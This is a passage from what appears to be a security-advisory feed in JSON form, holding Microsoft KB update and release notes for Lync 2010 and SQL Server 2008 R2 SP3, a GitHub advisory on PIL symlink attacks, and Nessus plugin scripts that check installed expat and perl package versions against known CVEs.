class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Uccp_dll</td><td class=\"sbody-td\">4.0.7577.4072</td><td class=\"sbody-td\">5,955,344</td><td class=\"sbody-td\">28-Feb-2012</td><td class=\"sbody-td\">22:47</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucdll</td><td class=\"sbody-td\">4.0.7577.4072</td><td class=\"sbody-td\">13,306,632</td><td class=\"sbody-td\">28-Feb-2012</td><td class=\"sbody-td\">23:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucmapi.exe</td><td class=\"sbody-td\">4.0.7577.4087</td><td class=\"sbody-td\">647,440</td><td class=\"sbody-td\">25-Mar-2012</td><td class=\"sbody-td\">2:42</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucmapi64exe</td><td class=\"sbody-td\">4.0.7577.4087</td><td class=\"sbody-td\">2,448,656</td><td class=\"sbody-td\">25-Mar-2012</td><td class=\"sbody-td\">3:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucprivatedll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">412,240</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xceedzip.dll</td><td class=\"sbody-td\">6.5.10316.0</td><td class=\"sbody-td\">634,560</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">18:39</td><td class=\"sbody-td\">x86</td></tr></tbody></table></div><h5 class=\"sbody-h5 text-subtitle\">For all supported x64-based versions</h5><div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Attendantconsoleexe</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">4,631,136</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Attoimdll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">80,512</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ocapimdll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">342,632</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Rtmpltfm_dll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">6,416,976</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">22:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapidll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">141,064</td><td class=\"sbody-td\">10-Feb-2011</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Uccp_dll</td><td class=\"sbody-td\">4.0.7577.4072</td><td class=\"sbody-td\">5,955,344</td><td class=\"sbody-td\">28-Feb-2012</td><td class=\"sbody-td\">22:47</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucdll</td><td class=\"sbody-td\">4.0.7577.4072</td><td class=\"sbody-td\">13,306,632</td><td class=\"sbody-td\">28-Feb-2012</td><td class=\"sbody-td\">23:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucmapi.exe</td><td class=\"sbody-td\">4.0.7577.4087</td><td class=\"sbody-td\">647,440</td><td class=\"sbody-td\">25-Mar-2012</td><td class=\"sbody-td\">2:42</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucmapi64exe</td><td class=\"sbody-td\">4.0.7577.4087</td><td class=\"sbody-td\">2,448,656</td><td class=\"sbody-td\">25-Mar-2012</td><td class=\"sbody-td\">3:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ucprivatedll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">412,240</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xceedzip.dll</td><td class=\"sbody-td\">6.5.10316.0</td><td class=\"sbody-td\">634,560</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">18:39</td><td class=\"sbody-td\">x86</td></tr></tbody></table></div></div><h2>References</h2><div class=\"kb-references-section section\"><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:<div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-4\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</div></span></div></body></html>", "modified": "2020-05-20T02:28:50", "id": "KB2496326", "href": "https://support.microsoft.com/en-us/help/2496326/", "published": "2020-05-20T02:28:40", "title": "Description of the cumulative update for Lync 2010 Attendant: June 2012", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-05-21T10:34:50", "bulletinFamily": "microsoft", "description": "<html><body><p>Describes SQL Server 2008 R2 Service Pack 3 release information.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This article contains important information to read before you install Microsoft SQL Server 2008 R2 Service Pack 3 (SP3). It describes how to obtain the service pack, the list of fixes included in the service pack, how to select the correct download based on your currently installed version, and a list of copyright attributions for the product.<br/><br/><span class=\"text-base\">Note </span>This article serves as a single source of information for finding all documentation related to this service pack. It includes all the information that you previously used to find in the Release notes and Readme.txt files.<br/><br/> </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">How to obtain SQL Server 2008 R2 SP3</h3>SQL Server 2008 R2 SP3 is available for download at the <a href=\"http://go.microsoft.com/fwlink/?linkid=512818&clcid=0x409\" id=\"kb-link-1\" target=\"_self\">SQL Server 2008 R2 SP3 download page</a>. You can download SQL Server 2008 R2 SP3 Feature Pack <a href=\"http://go.microsoft.com/fwlink/?linkid=512819&clcid=0x409\" id=\"kb-link-2\" target=\"_self\">here</a>.<h3 class=\"sbody-h3\">List of fixes included in SQL Server 2008 R2 SP3</h3>Microsoft SQL Server 2008 R2 service packs are cumulative updates and SQL Server 2008 R2 SP3 upgrades all editions and service levels of SQL Server 2008 R2 to SQL Server 2008 R2 SP3.<br/><br/>This service pack contains fixes from all Cumulative Updates that were released since SP2 for SQL Server 2008 R2. For a full list of fixes from various cumulative updates since SP2, click the following article number to view the article in the Microsoft Knowledge Base. <div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/2730301\" id=\"kb-link-3\">2730301 </a> The SQL Server 2008 R2 builds that were released after SQL Server 2008 R2 Service Pack 2 was released </span></div>In addition to the Cumulative Update fixes, this service pack also includes the following fixes.<br/><br/><br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">VSTS Bug</th><th class=\"sbody-th\">KB article number</th><th class=\"sbody-th\">Description</th><th class=\"sbody-th\">Fix area</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">2976923</td><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2994310\" id=\"kb-link-4\">2994310 </a></td><td class=\"sbody-td\">FIX: Distribution Agent for Oracle subscription fails when you use SQL Server 2008 R2 or SQL Server 2008</td><td class=\"sbody-td\">SQL service</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2984340\" id=\"kb-link-5\">2984340 </a></td><td class=\"sbody-td\">MS14-044: Vulnerabilities in SQL Server could allow elevation of privilege: August 12, 2014</td><td class=\"sbody-td\">SQL service</td></tr></tbody></table></div><h3 class=\"sbody-h3\">Select the correct file to download and install</h3>The SQL Server 2008 R2 SP3 download page contains the system requirements for installing SQL Server 2008 R2 SP3 and basic installation instructions. For additional documentation about how to upgrade installed SQL Server 2008 R2 components with a SQL Server 2008 R2 servicing update, see <a href=\"http://msdn.microsoft.com/library/dd631803(sql.10).aspx\" id=\"kb-link-6\" target=\"_self\">SQL Server 2008 R2 Servicing Documentation</a>.<br/><br/>For more information about how to install SQL Server 2008 R2, see <a href=\"http://go.microsoft.com/fwlink/?linkid=154143\" id=\"kb-link-7\" target=\"_self\">SQL Server 2008 R2 Installation</a>.<br/><br/>Use the following table to identify the location and name of the file to download based on your currently installed version. The download pages provide system requirements and basic installation instructions.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Version you currently have installed</th><th class=\"sbody-th\">Action you want to take</th><th class=\"sbody-th\">File to download and install</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of SQL Server 2008 R2 RTM Express or SQL Server 2008 R2 SP1 Express or SQL Server 2008 R2 SP3 Express</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3 Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of only the client and manageability tools for SQL Server 2008 R2 or SQL Server 2008 R2 SP1 (including SQL Server 2008 R2 Management Studio) or SQL Server 2008 R2 SP2 (including SQL Server 2008 R2 Management Studio)</td><td class=\"sbody-td\">Upgrade the client and manageability tools to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of SQL Server 2008 R2 Management Studio Express or SQL Server 2008 R2 SP1 Management Studio Express or SQL Server 2008 R2 SP2 Management Studio Express</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3 Management Studio Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Both of the following:<ul class=\"sbody-free_list\"><li>A 32-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</li><li>A 32-bit version of the client and manageability tools (including SQL Server 2008 R2 RTM Management Studio)</li></ul></td><td class=\"sbody-td\">Upgrade all products to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of one or more tools from the Microsoft SQL Server 2008 R2 RTM Feature Pack</td><td class=\"sbody-td\">Upgrade the tools to the 32-bit version of Microsoft SQL Server 2008 R2 SP3 Feature Pack</td><td class=\"sbody-td\">One or more files from Microsoft SQL Server 2008 R2 SP3 Feature Pack</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 32-bit installation of SQL Server 2008 R2</td><td class=\"sbody-td\">Install SQL Server 2008 R2 Management Studio including SP3</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/en-us/download/details.aspx?id=30438\" id=\"kb-link-9\" target=\"_self\">SQLManagementStudio_x86_ENU.exe</a> install the free SQL Server 2008 R2 SP2 Management Studio Express Edition; then, SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit bit version of SQL Server 2008 R2 RTM Express or SQL Server 2008 R2 SP1 Express or SQL Server 2008 R2 SP2 Express</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of only the client and manageability tools for SQL Server 2008 R2 or SQL Server 2008 R2 SP1 (including SQL Server 2008 R2 Management Studio) or SQL Server 2008 R2 SP2 (including SQL Server 2008 R2 Management Studio)</td><td class=\"sbody-td\">Upgrade the client and manageability tools to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of SQL Server 2008 R2 Management Studio Express or SQL Server 2008 R2 SP1 Management Studio Express or SQL Server 2008 R2 SP2 Management Studio Express</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3 Management Studio Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Both of the following:<ul class=\"sbody-free_list\"><li>A 64-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</li><li>A 64-bit version of the client and manageability tools (including SQL Server 2008 R2 RTM Management Studio)</li></ul></td><td class=\"sbody-td\">Upgrade all products to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of one or more tools from the Microsoft SQL Server 2008 R2 RTM Feature Pack</td><td class=\"sbody-td\">Upgrade the tools to the 64-bit version of Microsoft SQL Server 2008 R2 SP3 Feature Pack</td><td class=\"sbody-td\">One or more files from Microsoft SQL Server 2008 R2 SP3 Feature Pack</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 64-bit installation of SQL Server 2008 R2</td><td class=\"sbody-td\">Install Server 2008 R2 including SP2</td><td class=\"sbody-td\"><a href=\"http://go.microsoft.com/fwlink/?linkid=251791\" id=\"kb-link-11\" target=\"_self\">SQL Server 2008 R2 SP2 \u2013 Express Edition</a> and then SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 64-bit installation of SQL Server 2008 R2 Management Studio</td><td class=\"sbody-td\">Install SQL Server 2008 R2 Management Studio including SP3</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/en-us/download/details.aspx?id=30438\" id=\"kb-link-12\" target=\"_self\">SQLManagementStudio_x64_ENU.exe</a> to install the free SQL Server 2008 R2 SP2 Management Studio Express Edition; then, SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr></tbody></table></div><span class=\"text-base\">Note</span> After you install the service pack, the SQL Service version should be reflected as 10.50.6000.34.<div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Copyright attributions</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p></p><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li><span>This product contains software derived from the Xerox Secure Hash Function.</span></li><li><span>This product includes software from the zlib general purpose compression library.</span></li><li><span>Parts of this software are based in part on the work of RSA Data Security, Inc. Because Microsoft has included the RSA Data Security, Inc., software in this product, Microsoft is required to include the text below that accompanied such software: </span><ul class=\"sbody-free_list\"><li><span>Copyright 1990, RSA Data Security, Inc. All rights reserved.</span></li><li><span>License to copy and use this software is granted provided that it is identified as the \"RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing this software or this function. License is also granted to make and use derivative works provided that such works are identified as \"derived from the RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing the derived work.</span></li><li><span>RSA Data Security, Inc., makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided \"as is\" without express or implied warranty of any kind.</span></li></ul><span>These notices must be retained in any copies of any part of this documentation or software.</span></li><li><span>The Reporting Services mapping feature uses data from TIGER/Line Shapefiles that are provided courtesy of the U.S. Census Bureau (<a href=\"http://go.microsoft.com/fwlink/?linkid=179079\" id=\"kb-link-13\" target=\"_self\">http://www.census.gov/</a>). TIGER/Line Shapefiles are an extract of selected geographic and cartographic information from the Census MAF/TIGER database. TIGER/Line Shapefiles are available without charge from the U.S. Census Bureau. To obtain more information about the TIGER/Line shapefiles, go to <a href=\"http://go.microsoft.com/fwlink/?linkid=179080\" id=\"kb-link-14\" target=\"_self\">http://www.census.gov/geo/www/tiger</a>. The boundary information in the TIGER/Line Shapefiles is for statistical data collection and tabulation purposes only; its depiction and designation for statistical purposes does not constitute a determination of jurisdictional authority, rights of ownership, or entitlement, and does not reflect legal land descriptions. Census TIGER and TIGER/Line are registered trademarks of the U.S. Bureau of the Census.</span></li></ul><span>Copyright 2012 Microsoft. All rights reserved. </span></div></div></div></div></div><h2>References</h2><div class=\"kb-references-section section\"><span>For more information about how to determine the current SQL Server version and edition, click the following article number to go to the article in the Microsoft Knowledge Base: <br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/321185\" id=\"kb-link-15\">321185 </a> <br/> How to identify your SQL Server version and edition <br/> </div></span><span>The third-party products that this article discusses are manufactured by companies that are independent of Microsoft. Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.</span></div></body></html>", "modified": "2020-05-20T01:51:36", "id": "KB2979597", "href": "https://support.microsoft.com/en-us/help/2979597/", "published": "2020-05-20T01:50:28", "title": "SQL Server 2008 R2 Service Pack 3 release information", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2020-05-18T21:09:29", "bulletinFamily": "software", "description": "The (1) JpegImagePlugin.py and (2) EpsImagePlugin.py scripts in Python Image Library (PIL) 1.1.7 and earlier and Pillow before 2.3.1 uses the names of temporary files on the command line, which makes it easier for local users to conduct symlink attacks by listing the processes.", "modified": "2020-05-18T17:41:19", "published": "2020-05-18T17:41:19", "id": "GHSA-R854-96GQ-RFG3", "href": "https://github.com/advisories/GHSA-r854-96gq-rfg3", "title": "Python Image Library (PIL) allows symlink attacks", "type": "github", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2020-05-21T16:57:52", "bulletinFamily": "scanner", "description": "Buffer overflow in the XML parser in Mozilla Firefox before 38.0,\nFirefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows\nremote attackers to execute arbitrary code by providing a large amount\nof compressed XML data, a related issue to CVE-2015-1283 .\n(CVE-2015-2716)", "modified": "2020-05-15T00:00:00", "id": "ALA_ALAS-2020-1364.NASL", "href": "https://www.tenable.com/plugins/nessus/136625", "published": "2020-05-15T00:00:00", "title": "Amazon Linux AMI : expat (ALAS-2020-1364)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2020-1364.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136625);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/19\");\n\n script_cve_id(\"CVE-2015-2716\");\n script_xref(name:\"ALAS\", value:\"2020-1364\");\n\n script_name(english:\"Amazon Linux AMI : expat (ALAS-2020-1364)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Buffer overflow in the XML parser in Mozilla Firefox before 38.0,\nFirefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows\nremote attackers to execute arbitrary code by providing a large amount\nof compressed XML data, a related issue to CVE-2015-1283 .\n(CVE-2015-2716)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2020-1364.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update expat' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:expat-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"expat-2.1.0-11.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"expat-debuginfo-2.1.0-11.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"expat-devel-2.1.0-11.22.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat / expat-debuginfo / expat-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T16:49:38", "bulletinFamily": "scanner", "description": "According to the versions of the perl packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The XSLoader::load method in XSLoader in Perl does not\n properly locate .so files when called in a string eval,\n which might allow local users to execute arbitrary code\n via a Trojan horse library under the current working\n directory.(CVE-2016-6185)\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1527.NASL", "href": "https://www.tenable.com/plugins/nessus/136230", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : perl (EulerOS-SA-2020-1527)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136230);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-4330\",\n \"CVE-2016-6185\"\n );\n script_bugtraq_id(\n 70142\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : perl (EulerOS-SA-2020-1527)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the perl packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The XSLoader::load method in XSLoader in Perl does not\n properly locate .so files when called in a string eval,\n which might allow local users to execute arbitrary code\n via a Trojan horse library under the current working\n directory.(CVE-2016-6185)\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1527\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8068d3bb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected perl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Pod-Escapes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) 